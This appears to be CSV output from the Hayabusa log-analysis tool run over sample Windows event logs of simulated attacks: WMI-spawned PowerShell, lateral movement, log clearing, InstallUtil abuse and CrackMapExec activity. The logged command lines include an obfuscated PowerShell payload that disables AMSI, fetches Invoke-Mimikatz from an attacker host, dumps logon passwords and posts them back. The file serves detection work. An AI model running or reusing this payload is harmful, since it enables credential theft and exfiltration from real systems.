Disabled,,rules/sigma/registry_sysmon/registry_event/registry_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 15:01:27.604 +00:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x35d1aad | PID: 1860 | PGUID: A57649D1-3BC7-6189-091B-5D0300000000 | Hash: 
SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-08 15:01:27.604 +00:00,fs03vuln.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-08 15:01:27.604 +00:00,fs03vuln.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-08 15:01:27.604 +00:00,fs03vuln.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-08 15:01:27.604 +00:00,fs03vuln.offsec.lan,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-13 14:08:43.058 +00:00,FS03.offsec.lan,4688,low,Disc,Local Accounts 
Discovery,,rules/sigma/process_creation_builtin/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-4648 Lateral movement with net use.evtx +2021-11-13 14:08:43.058 +00:00,FS03.offsec.lan,4688,medium,LatMov,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation_builtin/proc_creation_win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-4648 Lateral movement with net use.evtx +2021-11-13 14:08:43.058 +00:00,FS03.offsec.lan,4688,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation_builtin/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-4648 Lateral movement with net use.evtx +2021-11-13 14:08:45.929 +00:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: - | Process: | Target Server: cifs/fs03vuln.offsec.lan,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-4648 Lateral movement with net use.evtx +2021-11-13 14:30:53.638 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-13 14:30:58.226 +00:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: ::1 | Process: C:\Windows\System32\svchost.exe | Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-13 14:30:58.226 +00:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 0xa6f5fa4 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-13 14:30:58.226 +00:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 0xa6f5fc2 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-13 14:30:58.226 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0xa6f5fa4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-18 07:40:29.566 +00:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00 | Hash: 
SHA1=22A72E39D307BC628093B043EF058DB1310BBF4B,MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 07:40:29.774 +00:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\CSCFD9BAF75EA53488BBE2F1273837CC796.TMP | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 07:40:29.795 +00:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\zoom-update.exe | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 07:40:29.795 +00:00,PC-01.cybercat.local,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 07:40:29.795 +00:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CVTRES.EXE-BBD3ED93.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 
+2021-11-18 07:40:29.809 +00:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CSC.EXE-B6D5E435.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 07:40:30.866 +00:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\svchost.exe | PID: 748 | PGUID: 510C1E8A-EF18-6195-0F00-000000000F00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 07:40:35.935 +00:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\DllHost.exe | PID: 2348 | PGUID: 510C1E8A-036E-6196-6A01-000000000F00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 07:40:46.157 +00:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 
510C1E8A-FFD9-6195-4401-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 07:40:46.404 +00:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 07:42:34.415 +00:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 07:42:34.416 +00:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 07:42:54.822 +00:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1218.004,technique_name=InstallUtil | Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe | Process: 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 816 | PGUID: 510C1E8A-03FE-6196-7101-000000000F00 | Hash: SHA1=25F66231385528D9F0E14546E2132AC486CB6955,MD5=964D5013C1EC42371AD135E02221A704,SHA256=19C86A9315EECCBB480BA6C48711EE24EA24EE97E27C1E1EEAC8B63D01A71D9F,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 07:42:54.822 +00:00,PC-01.cybercat.local,1,medium,Evas,Suspicious Execution of InstallUtil Without Log,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 07:42:54.822 +00:00,PC-01.cybercat.local,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 07:43:04.979 +00:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\INSTALLUTIL.EXE-9953E407.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 07:43:22.487 +00:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 510C1E8A-FFD9-6195-4401-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 
+2021-11-18 07:43:22.705 +00:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-23 09:26:30.059 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157add,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.121 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157afc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.121 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.137 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b29,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.137 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 
2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.168 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b4e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.246 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b70,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.309 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.371 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157bac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.635 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 
,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 , 46 , 77 ,97,110 , 39 , 43 , 39,97, 103 , 101,109 , 101,110 ,116 , 46 , 65, 117, 116 , 39, 43,39,111 ,109,97 ,116,105, 111, 110,46 ,65, 109,39,43,39 , 115, 105 ,85 ,116 , 39 ,43 , 39 , 105 ,108,115 , 39, 41, 46 ,71 ,101,116 ,70 , 105 , 101, 108 , 100,40,39 ,97 , 109, 39 ,43, 39 ,115,105,73,110 ,105, 39, 43, 39, 116 ,70 ,97 ,105 ,108 ,101, 100,39,44, 32 ,39 , 78 ,111, 110 , 80 , 39,43,39 , 117 ,98, 108 ,105,99 , 44 , 83, 116 , 97 ,39,43,39 ,116 , 105 , 99 ,39,41,46 ,83,101 ,116,86,97, 108 , 117 ,101 , 40 ,36, 110 , 117,108,108,44 ,32 ,36 ,116 ,114,117,101,41, 10 ,125 , 99 ,97, 116, 99,104 ,123,125 , 10 ,91, 78 ,101, 116, 46, 83 , 101,114,118,105 , 99, 101 ,80 ,111 ,105 , 110 ,116 , 77 , 97,110, 97 , 103, 101 , 114, 93 ,58 , 58, 83 ,101,114 , 118 , 101, 114 ,67,101,114,116,105 , 102, 105,99 , 97 , 116,101 , 86 , 97 , 108,105, 100,97,116 ,105 ,111 ,110,67 ,97 ,108, 108,98, 97,99 ,107, 32,61, 32, 123,36,116,114 ,117 , 101 ,125,10, 91 , 83 ,121 , 115 ,116, 101 , 109 ,46 ,78, 101 ,116,46,83, 101 ,114, 118 ,105, 99, 101 , 80,111 , 105 ,110 ,116, 77, 97,110 ,97 ,103,101,114 ,93, 58,58, 83 ,101,99 , 117 ,114 , 105, 116 , 121 , 80,114 , 111 ,116 ,111 ,99 , 111,108 , 32 , 61 , 32,91 ,83 , 121 , 115, 116, 101, 109,46,78, 101, 116 ,46 ,83 ,101 , 99 , 117,114,105, 116 ,121,80 , 114 ,111 , 116, 111,99, 111,108,84, 121,112, 101 , 93,39 , 83 , 115 , 108 ,51 , 44 ,84 ,108,115, 44 ,84, 108,115, 49,49 , 44, 84,108 , 115 ,49, 50, 39,10, 73,69 ,88, 32 , 40, 78,101 , 119 , 45 ,79, 98, 106 , 101 , 99 , 
116, 32 ,78,101 ,116 , 46,87 , 101,98 , 67, 108 , 105 ,101,110,116,41,46,68 , 111, 119,110 ,108 , 111 ,97,100 ,83 , 116 , 114, 105 , 110, 103,40 ,39,104 ,116,116, 112 ,115, 58,47 , 47 ,49, 48,46 ,50,51 ,46 , 49, 50 ,51, 46,49, 49 ,58 , 50 ,54 ,50, 54 , 47 , 73 ,110, 118 , 111, 107 ,101,45,77 , 105 ,109, 105 , 107, 97 , 116 , 122, 46 ,112,115, 49 ,39, 41,10, 36 ,99 ,109 ,100 ,32,61,32,73, 110 , 118,111, 107, 101 ,45 , 77, 105, 109 ,105, 107 , 97, 116,122 ,32 ,45, 67,111, 109 ,109 ,97 ,110,100, 32,39 ,112,114 ,105, 118, 105,108 , 101, 103,101,58 ,58,100 ,101 , 98,117,103 ,32,115,101,107,117 ,114,108 ,115 ,97 ,58 , 58 , 108, 111 ,103, 111,110, 112 ,97,115 , 115 , 119,111, 114,100 , 115 , 32 , 101, 120 ,105 , 116,39,10 , 36, 114,101 ,113 ,117 , 101, 115 , 116,32,61, 32 , 91 ,83 , 121 , 115,116 ,101, 109 , 46,78, 101,116, 46 ,87,101,98,82,101 , 113 ,117,101 , 115 ,116 ,93, 58 , 58 , 67,114 ,101, 97 , 116, 101 , 40 ,39 ,104,116 ,116 , 112 ,115, 58 , 47 , 47, 49,48 ,46, 50 , 51 , 46 ,49, 50 , 51, 46,49 ,49, 58 , 50,54 , 50,54 , 47 ,39, 41,10 ,36 ,114, 101, 113,117,101 ,115,116 , 46,77, 101,116,104 , 111 , 100 , 32 , 61, 32,39 , 80, 79 , 83,84,39 ,10 , 36 ,114 , 101, 113 , 117 , 101 ,115,116 , 46 ,67,111, 110 , 116, 101, 110,116 ,84,121, 112,101,32 , 61 , 32 ,39 ,97 ,112 ,112 ,108 , 105 , 99,97 , 116, 105 ,111 , 110, 47, 120,45 , 119, 119 , 119 ,45 ,102,111, 114 ,109 ,45,117, 114, 108 , 101 ,110 ,99 , 111,100 , 101 ,100 , 39,10,36,98,121, 116, 101, 115 , 32 , 61 ,32 , 91 , 83, 121 , 115, 116,101 , 109 , 46, 84 ,101, 120 ,116 , 46, 69 , 110, 99 , 111 , 100 ,105 ,110 ,103,93 , 58 ,58, 65 , 83, 67, 73 , 73 , 46 ,71, 101 ,116 ,66 , 121 , 116,101 , 115 , 40 ,36 ,99 , 109 , 100, 41, 10, 36 , 114, 101, 113, 117 , 101, 115, 116, 46, 67 , 111, 110 ,116, 101,110 , 116 , 76, 101, 110,103,116 , 104 , 32, 61 ,32, 36 ,98 ,121,116, 101 ,115 ,46, 76, 101,110,103 ,116, 104,10, 36, 114 , 101, 113 , 117 ,101, 115, 116,83,116 ,114 ,101,97, 109 , 32,61 , 32 ,36, 114,101 ,113 , 117 , 101 , 115 
, 116,46 , 71, 101, 116,82,101,113 ,117,101, 115 ,116 ,83, 116,114, 101, 97,109 , 40,41, 10, 36,114 , 101 , 113, 117, 101 ,115 , 116 , 83,116 ,114 , 101 , 97 ,109 , 46, 87,114 ,105 ,116,101,40,36 , 98 , 121 ,116 , 101 , 115 ,44,32 ,48 ,44, 32, 36 ,98, 121,116,101 ,115 , 46, 76 , 101,110 ,103,116, 104, 41 , 10 , 36,114,101,113 , 117,101 , 115, 116,83,116,114 , 101, 97 , 109 , 46,67, 108,111 ,115,101 , 40 ,41 , 10 , 36, 114 ,101, 113, 117, 101,115 , 116 , 46, 71 , 101 ,116,82 ,101 , 115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: FS03VULN$ | LID: 0x3e4",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.635 +00:00,fs03vuln.offsec.lan,4688,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,rules/sigma/process_creation_builtin/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.635 +00:00,fs03vuln.offsec.lan,4688,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation_builtin/proc_creation_win_set_policies_to_unsecure_level.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.635 +00:00,fs03vuln.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 
+2021-11-23 09:26:30.651 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -exec bypass -noni -nop -w 1 -C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 ,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 , 46 , 77 ,97,110 , 39 , 43 , 39,97, 103 , 101,109 , 101,110 ,116 , 46 , 65, 117, 116 , 39, 43,39,111 ,109,97 ,116,105, 111, 110,46 ,65, 109,39,43,39 , 115, 105 ,85 ,116 , 39 ,43 , 39 , 105 ,108,115 , 39, 41, 46 ,71 ,101,116 ,70 , 105 , 101, 108 , 100,40,39 ,97 , 109, 39 ,43, 39 ,115,105,73,110 ,105, 39, 43, 39, 116 ,70 ,97 ,105 ,108 ,101, 